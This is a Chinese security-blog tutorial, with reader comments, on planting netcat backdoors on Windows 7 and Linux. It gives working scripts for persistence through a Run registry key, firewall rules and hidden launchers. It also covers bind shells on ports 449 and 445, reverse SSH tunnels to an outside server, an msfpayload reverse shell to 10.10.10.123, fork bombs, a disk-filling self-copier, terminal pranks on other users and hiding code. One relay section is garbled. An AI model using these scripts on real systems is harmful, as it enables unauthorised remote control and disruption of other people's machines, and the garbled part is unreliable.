telnet towel.blinkenlights.nl
FB招聘站
分类阅读
专栏
公开课
FIT 2019
企业服务
用户服务
搜索
投稿
登录
注册
Windows、Linux后门解析 SecDarker2016-01-02现金奖励共902494人围观 ,发现 18 个不明物体 系统安全
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
本文作者:secdarker
6.png
操作系统后门学习—Windows篇
0×00 准备工作
假设用户以管理员权限登录系统,在Windows 7系统上使用netcat 创建一个后门。
Netcat 功能比较单一, 缺少了许多我们渗透工作中需要的功能。为此我们将创建一个便携式的工具包来解决这个问题 :
1.下载额外的文件和附加持续.
2.编辑修改指定文件.
3.快速创建执行后门.
4.控制远程服务器并进行恶作剧 :)
为了便于你第一时间获取到你的工具包,你需要将它放置在一个独立的U盘或者在线服务器上。
便携式工具(Portable Applications)
便携式工具是那些不需要安装就能直接使用的程序,它们往往将所有的执行环境和核心程序本身一同打包成一个独立的文件,方便携带。在独立文件执行的过程中会自行释放额的需求文件,并构建一个可顺利执行目标程序的环境。
1.不依赖特定的dll(dll已经打包)
2.不依赖注册表设置(有可能自行初始化) ,不遗留下任何注册表操作痕迹
3.操作痕迹最小化,尽量避免一切不必要的操作,导致留下过多的系统操作记录
创建 Windows 7 工具集
gVim (跨平台的文本编辑器, 提供强大的命令行操作交互)
Wget (下载 windows 64 位版本)
Netcat
有Kali系统的可以用命令 “find / -name nc.exe”搜索到http://www.kali.org/或者下载已经编译好的版本http://joncraton.org/blog/46/netcat-for-windows/
0×01初试 Netcat 后门
nc.exe -dLp 449 -e cmd.exe
-L 这个选项会开启一个监听服务并等待客户端连接, 在客户端连接成功之后,会提供相应的交互服务。
– p 指定程序监听的端口(非管理员权限只能设置高于1024的端口. 同时不可复用现有端口)
– e 在接收到一个客户端连接后, 会执行一个特定的程序(这里是cmd.exe), 这个程序负责接下来的会话交互(执行客户端后期提交的任何命令)
– d 采取静默监听模式,避免nc运行过程中,产生过多额外的日志信息
Windows 7 后门安装批处理脚本
@echo off
Rem 拷贝文件到系统目录
xcopy "%systemdrive%\%username%\Desktop\nc.exe" "C:
\Windows\System32\" -y
Rem 修改注册表,增加后门自启动代码.
reg add "HKLM\software\microsoft\windows\currentversion\run" /f /v "system" /t
REG_SZ /d "C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"
Rem 添加防火墙规则,开放监听的449端口,允许外部连接.
netsh advfirewall firewall add rule name="Rule 34" dir=in action=allow
protocol=UDP localport=449
netsh advfirewall firewall add rule name="Rule 35" dir=in action=allow
protocol=TCP localport=449
Rem 添加防火墙规则,允许nc.exe对外提供连接.
netsh advfirewall firewall add rule name="Allow Messenger" dir=in action=allow
program="C:\windows\system32\nc.exe"
注意:
1.必须使用管理员权限运行上面的脚本.
2.行为注释可删除
更多相关操作:
http://www.offensive-security.com/metasploit-unleashed/Persistent_Netcat_Backdoor
终端基础命令
Linux 命令
1 cd - 切换当前目录到指定路径下
2 pwd - 现实当前工作目录的绝对路径
3 ls - 显示目录中所有文件和文件夹
4 cat file.txt - 现实文件内容
5 wget - 命令行文件下载器
6 vim - 命令行文件编辑器
7 ./scriptname - 运行脚本
8 export PATH=$PATH:/opt/new - 临时添加路径到系统环境变量$PATH
($PATH:决定了shell将到哪些目录中寻找命令或程序,PATH的值是一系列目录,当你运行一个程序时,Linux在这些目录下进行搜寻你指定的程序)
Windows命令
1 CD
2 PWD
3 Dir/p
4 Type
5 Wget from toolkit
6 Vim from toolkit
7 Wscript scriptname.vbs
8 SET PATH =%PATH%;c:\pathtoolkit
CMD 环境变量Path
c:\> set PATH "%PATH%;C:\bin"
管理Windows PATH 环境变量的批处理脚本http://gallery.technet.microsoft.com/Batch-Script-To-Manage-7d0ef21e
1.png
使用 VBS 脚本后台运行 Netcat
这样做的好处是我们不用等待电脑重启
Dim objShell
Set objShell = WScript.CreateObject("WScript.shell")
objShell.run "C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"
Set objShell = Nothing
使用 Netcat 连接后门
nc-v 目标IP 目标端口
11.png
查看进程信息(Process Explorer)
Process Explorer下载地址:http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx
111.jpg
查看网络连接(TCPView)
TCPView下载地址:http://technet.microsoft.com/en-us/sysinternals/bb897437.aspx
1111.jpg
不使用CMD运行命令或者批处理脚本的几种方法
Vbscript
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "C:\mybat.bat" & Chr(34), 0
Set WshShell = Nothing
Batch
@echo off
start /B mybat.bat
Powershell
PowerShell.exe -windowstyle hidden
0×02 Windows 恶作剧
(更多精彩:http://vbscripts.webs.com/pranks)
让键盘持续不断的输入 "Hello"
Set wshShell = wscript.CreateObject("WScript.Shell") do
wscript.sleep 100
wshshell.sendkeys "Hello" loop
以.vbs后缀保存,并执行
按住大小写键不放
Set wshShell =wscript.CreateObject("WScript.Shell") do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}" loop
以.vbs后缀保存, 并执行
硬盘炸弹(随机生成垃圾文件填充硬盘)
模拟病毒拷贝行为: http://www.instructables.com/id/how-to-make-a-fork-bomb-exe/
:echo off
copy /Y %0 %random%.bat
start %0%0|%0
goto :e
以 .bat 后缀保存, 并执行
笔记本弹窗炸弹
@echo off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
2.png
网页弹窗炸弹
· start "www.example.com"
以 .bat后缀保存,并执行。http://vbscripts.webs.com/pranks
键盘狂舞
· 下面这个脚本会不断的发送按键模拟信息,循环模拟按下“大小写键”,“数字键”以及“截屏键”的操作。从而导致键盘对应的LED指示灯,疯狂闪烁 . ( ̄▽ ̄)"
Set wshShell =wscript.CreateObject("WScript.Shell")do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"loop
以.vbs后缀保存,并执行http://vbscripts.webs.com/pranks
播放 windows 启动音乐
Set objVoice = CreateObject("SAPI.SpVoice")
Set objFile = CreateObject("SAPI.SpFileStream.1")
objFile.Open "Windows XP Startup.wav"
objVoice.Speakstream objFi
以.vbs后缀保存,并执行。http://vbscripts.webs.com/pranks
光驱炸弹
持续不断的抽插您的光驱(-__-!!!)
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs =oWMP.cdromCollectiondo
if colCDROMs.Count >= 1 then For i = 0 to
colCDROMs.Count - 1
colCDROMs.Item(i).EjectNext For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject Next End If
wscript.sleep 5000 loop
以 .vbs 后缀保存,并执行
Windows FORK 炸弹
FORK炸弹会不断的复制自身,持续性的消耗系统资源,最终导致系统资源耗尽,无法进行其他的操作。
Windows 批处理FORK炸弹
@ECHO OFF
:START
START fork.bat
GOTO START
以 .bat后缀保存,并执行
文件夹锁定攻击
@echo off
md hello
:A
start hello
goto A
以 .bat 后缀保存,并执行
鬼话连篇
Set args = Wscript.Arguments
speakargtext = args.Item(0)
Rem 你的鬼话赋值给 strText
strText = "your message here"
Set objVoice = CreateObject("SAPI.SpVoice")
objVoice.Speak strText
objVoice.Speak speakargtext
以 .vbs 后缀保存,并执行。
0×03 实战细节
Windows 关机指令
· %windir%\system32\shutdown.exe -r -t 00
· shutdown -r — 重启
· shutdown -s — 关机
· shutdown -l — 注销
· shutdown -t xx —等待 xx 秒后执行 shutdown/restart/logoff 操作
· shutdown -i — 使用图形用户界面.
· shutdown -a — 撤销之前执行的任何shutdown命令
批处理编译成EXE
将脚本编译成二进制文件,能在一定程度上的隐藏你的代码.
– 虽然无法保证完全安全,但是在隐蔽性和灵活性上能有很大提升.
· 批处理编译工具
– http://dwz.cn/2sIzlg
22.png
· VBS编译工具
– http://sourceforge.net/projects/htwoo/
– http://dwz.cn/2sJ4cB
· Powershell编译工具
– http://ps2exe.codeplex.com/ (beta)
netsh 配置windows 7防火墙
C:\> netsh advfirewall set allprofiles state off
– 关闭windows防火墙(会有用户提示信息)
C:\> netsh advfirewall set allprofiles state on
– 开启windows防火墙
C:\> netsh advfirewall reset
– 重置防火墙策略到默认策略状态
C:\> netsh advfirewall set allprofiles firewallpolicy blockinbound,
allowoutbound
– 设置防火墙策略为, 默认阻挡所有入站通信, 并允许出站通信
C:\> netsh advfirewall firewall add rule name="HTTP" protocol=TCP
localport=80 action=block dir=IN
222.png
– 阻挡所有针对本机TCP 80 端口的入站通讯
C:\> netsh advfirewall firewall delete rule name="HTTP”
– 删除之前创建的名为HTTP的防火墙规则
使用 “at”命令定时执行程序
\\computername: 指定运行命令的计算机。如果省略该参数,则 at 命令将按计划运行本地计算机上的命令和程序。
time: 指定命令运行的时间。时间是按 24 小时制的 hour:minutes 形式指定的. 比如, 0:00 代表午夜, 20:30 表示晚上八点 。
/every:date,…: 在每个星期或月的指定日期(例如,每个星期吴,或每月的第八天)运行 Command 命令。将 date 指定为一周内的一天或多天(使用下面的缩 写形式:M、T、W、Th、F、S、Su)或一月内的一天或多天(使用数字 1 至 31)。多 个日期项之间一定要用逗号隔开。如果省略此参数,则任务将安排在当天执行。
/next:date,…: 在下一个指定日期(例如,下一个星期一)到来时运行 Command 命令。 将 date 指定为一周内的一天或多天(使用下面的缩写形式:M、T、W、Th、F、S、Su) 或一月内的一天或多天(使用数字 1 至 31)。多个日期项之间一定要用逗号隔开。如果 省略此参数,则任务将安排在当天执行.
command: 指定要运行的命令、程序(.exe 或 .com 文件) 或者批处理程序(.bat 或 NaNd 文件)。如果该命令要求使用路径作为参数,请使用绝对路 径名(以驱动器号开头的完整路径)。如果该命令位于远程计算机上,请使用统一命名约 定 (UNC) 路径名(\\ServerName\ShareName)。如果该命令不是可执行 (.exe) 文件,必 须在命令前面添加 cmd /c,例如,cmd /c copy C:\*.* C:\temp 。
Note 当你使用at命令时,计划任务是以特定用户凭证执行的。
详见: http://support.microsoft.com/kb/313565
Sdelete (安全删除)
Usage: sdelete [-p passes] [-s] [-q]
[-p passes] [-z|-c] [drive letter] ...
-a 移除文件只读属性.
-c 清理可用空间.
-p passes 指定覆写操作的执行遍数 (default is 1).
-q 不显示操作 (静默模式).
-s or -r 递归删除整个目录下的所有文件.
-z 可用空间填零.
http://technet.microsoft.com/en-us/sysinternals/bb897443.aspx
操作系统后门学习—Linux篇
1×00 准备工作
下面我要使用netcat创建Linux后门
这里假设用户以root权限登录,并且遗留下了终端交互界面 ( ̄▽ ̄)".
Linux工具集
根据目标环境针对性的编译以下工具,以便生成对应系统的即用二进制文件.
Autossh(http://www.harding.motd.ca/autossh/)
Netcat(http://netcat.sourceforge.net/ Compile it)
Shred (core utils)
(http://www.linuxfromscratch.org/lfs/view/development/chapter05/coreutils.html)
Screen
(http://www.linuxfromscratch.org/blfs/view/svn/general/screen.html)
持续性连接脚本
默认情况下 GNU netcat 不支持持续性监听操作。每一次Accept并执行完命令之后,netcat就会断开连接。如果需要让 netcat 保持持续性监听状态,就必须使用循环语句不断的开启新的监听模式。
listener.sh 监听脚本
#!/bin/bash
while [ 1 ]; do
echo -n | netcat -l -v -p 445 -e /bin/bash
done
1×01 在Linux上部署Netcat后门
在Linux上创建后门
从你的站点下载netcat: wget http://你的站点.com/netcat
将netcat 拷贝到系统可执行程序目录:cp netcat /usr/bin
添加防火墙入站规则, 开放445端口:
iptables -A INPUT -m state --state NEW -m tcp -p tcp --dport 445 -j ACCEPT
添加防火墙出站规则, 开放445端口:
iptables -A OUTPUT -p tcp --dport 445 -m conntrack --ctstate NEW -j ACCEPT
后台执行监听脚本: nohup ./listener.sh &
添加开机启动
使用 /etc/rc.local 文件? 可是容易被人发现( ̄▽ ̄)"
Centos可以将启动脚本放到 /etc/rc.d/init.d/ 目录下
Debian可以将启动脚本放到 /etc/rc3.d/ 目录下
或者 /etc/rcN.d 其中n代表了运行级别。
连接后门:nc -v ipaddress port
1.png
显示程序打开的
11.png
端口:netstat -lptun
1×02 Linux 恶作剧
使用Perl脚本和特定的防火墙规则将倒霉蛋电脑上所有网页图片都倒置过来。
可以看看这个:http://www.ex-parrot.com/pete/upside-down-ternet.html
Linux Fork 炸弹
– :(){ :|:& }:
向特定的终端用户发送消息
– write 用户名
让电脑发出怪声:
– Cat /dev/urandom > /dev/dsp
http://unix.stackexchange.com/questions/232/unix-linux-pranks
改变所有的输出为bork bork
perl -e '$b="bork"; while(
Za-z]+/$b/g; print "$l$b\@$b:\$ ";}’
http://www.commandlinefu.com/commands/view/177/translate-your-terminal-into-swedish-chef
发送《星球大战》到别的用户终端
获取用户终端号
who
someuser pts/0 2014-03-20 22:26 (x.x.x.2)
root pts/1 2014-03-20 23:34 (x.x.x.2)
telnet towel.blinkenlights.nl > /dev/pts/0
使用fortune和cowsay 发送有趣的信息
fortune | cowsay > /dev/pts/0
用Cmatrix发送弹幕
cmatrix > /dev/pts/1
还有更多的Linux恶作剧技巧:
echo -e '\a'
- 让喇叭发出告警声
while :do
sleep 60
echo "Follow the white rabbit."done | write username
- 不间断的向终端发送消息
alias ls='echo "Segmentation fault"'
export PROMPT_COMMAND="ls"
- 将上面的代码添加到 ~username/.bashrc 文件中
每当运行ls命令的时候,回显结果看起来就像系统奔溃了一样
1×02 创建持续性的Netcat后门
保持程序后台运行的正确方法
nohup 命令 &
让执行的命令忽略所有的hangup信号
nohup command &
或者
- Ctrl-Z //暂停当前正在运行的程序
- Bg //在上个命令之后,将进程放到后台执行
- disown %1 //%1由jobs查询获得(http://danielbeard.wordpress.com/2011/06/08/detaching-a-running-process-
from-a-bash-shell/)
PHP 编译器
· Bcompiler
· Phc
· Ioncube
· hhvm
· 更多的编译器
– http://stackoverflow.com/questions/1408417/can-you-compile-
php-code
– http://stackoverflow.com/questions/1845197/convert-php-file-
to-binary
1×03 Netcat 局限性
Netcat具有以下局限性:
· 容易被发现
· 容易被他人发现,只要简单的连接到指定端口就能获取主机控制权限
· 程序本身和传输的数据都不加密
· 本身不能太少,必须配合许多额外的工具
这些问题该如何解决?
· 现在的NC后门,只能在同一个局域网中访问,而且必须添加额外的防火墙规则
· 在互联网上公开开放后门端口风险太大
. 你可能没有公网IP
1×04 SSH隧道后门
创建持续性 SSH 隧道
大部分时候,你能够通过放置一台公网SSH服务器,来接收被控服务器的SSH逆向连接,以到达持续性控制的目的。
首先你得买一台VPS服务器(Virtual Private Server,默认都会提供一个独立IP给你). 并开启监听服务。在被控制服务器上开启SSH 逆向连接操作,连接到VPS服务器开启的监听端口。到此SSH中转控制已经完成。
现在你能够随时随地的控制目标服务器了,尽管你和它也许都在内网之中.
111.jpg
(http://commons.wikimedia.org/wiki/File:Reverse_ssh_tunnel.jpg)
逆向 SSH 隧道
ssh -f -N -R 10000:localhost:22 user@external_server
-N不执行远程命令,只开启端口映射 (protocol version 2 only).
-f后台认证用户/密码,通常和-N连用,不用登录到远程主机。
-R [绑定的地址:]绑定的端口:目标IP:目标端口
将远程主机(服务器)的某个端口转发到本地端指定机器的指定端口. 工作原理是这样的, 远程主机上分配了一个 socket 侦听 port 端口, 一旦这个端口上有了连接, 该连接就经过安全通道转向出去, 同时本地主机和 host 的 hostport 端口建立连接. 可以在配置文件中指定端口的转发. 只有用 root 登录远程主机才能转发特权端口
SSH 反向代理例子
ssh -f -N -R 10000:localhost:22 user@external_server
– 将对本机 22 端口访问映射到 external_server 的 10000 端口上。
ssh -f -N -R 10001:10.0.2.3:455 user@external_server
– 将对10.0.2.3服务器455端口的访问,映射external_server的10001端口上。
ssh -f -N -R 10001:10.0.2.3:455 -R 10000:localhost:22 user@external_server
– 同时启动多条映射规则
生成 SSH 密钥
ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
ad:c8:3a:3a:5c:fd:48:34:ad:f2:ac:63:29:70:0e:d0 root@test
The key's randomart image is:
+-----------------+
拷贝密钥到远程主机
ssh-copy-id –I /root/.ssh/id_rsa.pub"-p 2222 user@remotemachine"
1111.jpg
使用autossh构建持续性反向SHELL
autossh -M 10984 -N -f -o "PubkeyAuthentication=yes" -o
"PasswordAuthentication=no" -i /root/.ssh/syspub -R 8888:
localhost:22 user@remoteserver -p 2222 &
-i /root/.ssh/syspub 本地 ssh 私钥
-M 监听端口
-o "PubkeyAuthentication=yes” 明确申明使用密钥验证
-o "PasswordAuthentication=no" 明确申明不使用密码验证
Windows下构建SSH方向隧道
C:\>plink -P 22 -l username -pw password -C -R 5900:127.0.0.1:5900
-P SSH 服务器端口
-l SSH 服务用户登陆名
-pw SSH 服务器用户登陆密码
-C 开启压缩模式
-R 转发远程端口到本地
http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
内网机:
将端口映射到远端服务器
echo y | plink2.exe -C -v -N -R 4444:127.0.0.1:3333 -pw passwprd root@192.168.99.247 -P 22
2.png
中转跳板机:
本地端口映射
mkfifo /tmp/tee
nc -l -p 5555 0 payload.exe – 生成独立的Windows二进制文件:
/payload/path R > payload.raw – 生成 raw 格式文件:
/payload/path C > payload.c – 生成 C 源码.
/payload/path J > payload.java – 生成java源码
创建一个payload
生成独立的可执行的二进制后门文件:
msfpayload windows/shell_reverse_tcp LHOST=10.10.10.123 LPORT=7777 x
> /tmp/david_hasselhoff.exe
查看文件信息:
file /tmp/david_hasselhoff.exe
PE32 executable (GUI) Intel 80386, for MS
Windows
二进制payload执行后, 远程服务器将会反弹一个cmd shell连接到10.10.10.123服务器的7777端口上
设置msfconsole监听指定端口
启动 msfconsole
msfconsole
use exploit/multi/handler
set payload windows/shell/reverse_tcp
set LHOST 10.10.10.123
set LPORT 7777
exploit
– msf 将会在7777端口监听等待远端shell 反弹
后门成功执行后
5.jpg
55.jpg
555.jpg
* 参考:introtobackdoors,作者:secdarker,未经许可禁止转载
SecDarker
SecDarker
10 篇文章
等级: 4级
||
上一篇:回看2015:那些让人心悸的勒索软件下一篇:继BBC“掉线”之后,世界多地区的WhatsApp也发生中断
这些评论亮了
redrain_QAQ 回复
这文章其实蠢到炸,当时看了原文我脑中就一大个疑问,完全不明白如何能上议题的
)42(亮了
JACK 回复
老子笑喷了,你怎么不写tlntadmn来做后门?好歹WIN原生态自带的,还不用传文件。难为你配这么多图了
)9(亮了
likehc (1级)回复
支持 楼主的精神,有图有真相。虽说技术有老了点,新手 当入门,老手当回忆 吧,不喜可以不看,但不能 一味的 喷呀,, 光喷是提升不了技术的,You can you up,no can no BB! 对标题党除外。。
)8(亮了
one_apple (1级)回复
666666
)6(亮了
Spidersking (1级)回复
66666666666666
)6(亮了
发表评论已有 18 条评论
one_apple (1级) 2016-01-02回复 1楼
666666
亮了(6)
Spidersking (1级) 2016-01-02回复 2楼
66666666666666
亮了(6)
redrain_QAQ 2016-01-02回复 3楼
这文章其实蠢到炸,当时看了原文我脑中就一大个疑问,完全不明白如何能上议题的
亮了(42)
one_apple (1级) 2016-01-02回复 4楼
这文章其实蠢到炸,当时看了原文我脑中就一大个疑问,完全不明白如何能上议题的
亮了(4)
one_apple (1级) 2016-01-02回复 5楼
123456
亮了(4)
蚂蚁将军 2016-01-02回复 6楼
作为入门文章挺不错, plink确实比lcx 好很多. 基本不杀.
以后是 powshell 和 正规软件的时代了
亮了(3)
卡丁在北京 2016-01-02回复 7楼
求赐一些tricky
亮了(3)
JACK 2016-01-02回复 8楼
老子笑喷了,你怎么不写tlntadmn来做后门?好歹WIN原生态自带的,还不用传文件。难为你配这么多图了
亮了(9)
caiyufei11 (1级) 2016-01-03回复 9楼
very nice ,!!
亮了(3)
a 2016-01-03回复 10楼
染病乱! 差评! fb这种文章都行!
亮了(3)
Flyfish (1级) Reset A New Password... ... 2016-01-03回复 11楼
@ redrain_QAQ 都是些几年前玩的小儿科,整理一堆就成文了?
亮了(3)
舒克舒克舒克l 2016-01-03回复 12楼
我要从编程学起怒怒怒
亮了(3)
Anything 2016-01-03回复 13楼
吓死宝宝了,我以为又出0day了
亮了(3)
逝去de枫 (2级) 2016-01-04回复 14楼
其实我一直坚信只要是大篇幅的配图文,或多或少都有存在的意义,然而这次真心然并卵了
亮了(3)
Fiend520 (7级) 2016-01-04回复 15楼
貌似很流弊的样子呀
亮了(4)
北纬 (1级) 2016-01-04回复 16楼
不明觉厉
亮了(5)
likehc (1级) 2016-01-04回复 17楼
支持 楼主的精神,有图有真相。虽说技术有老了点,新手 当入门,老手当回忆 吧,不喜可以不看,但不能 一味的 喷呀,, 光喷是提升不了技术的,You can you up,no can no BB! 对标题党除外。。
亮了(8)
pooja 2017-06-20回复 18楼
i want to from programming … good idea http://www.oimaa.in
亮了(0)
昵称
请输入昵称
必须您当前尚未登录。登陆?注册邮箱
请输入邮箱地址
必须(保密)表情插图
有人回复时邮件通知我
SecDarker
SecDarker
欢迎搜索关注微信公众号SecDarker,这是个神奇的公众号。
10
文章数
6
评论数
最近文章
分析取证指南:取证工具推荐
2016.01.13
Windows、Linux后门解析
2016.01.02
谷歌浏览器插件AVG Web TuneUp曝多个高危漏洞,影响900万用户
2015.12.30
浏览更多
相关阅读
使用DLL注入绕过Windows 10受控文件夹访问保护Linux内核ROP姿势详解(一)如何利用Ptrace拦截和模拟Linux系统调用Windows用户详细自查修复篇:微软紧急更新修复Meltdown和Spectre CPU漏洞[CVE-2013-1763]Linux内核3.3-3.8本地提权漏洞
特别推荐
关注我们 分享每日精选文章
活动预告
11月
FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气
已结束
10月
【16课时-连载中】挖掘CVE不是梦(系列课程2)
已结束
10月
【首节课仅需1元】挖掘CVE不是梦
已结束
9月
【已结束】自炼神兵之自动化批量刷SRC
已结束
FREEBUF免责声明协议条款关于我们加入我们广告及服务寻求报道广告合作联系我们友情链接关注我们
官方微信
新浪微博腾讯微博Twitter赞助商
Copyright © 2018 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号
css.php 正在加载中...0daybank
文章评论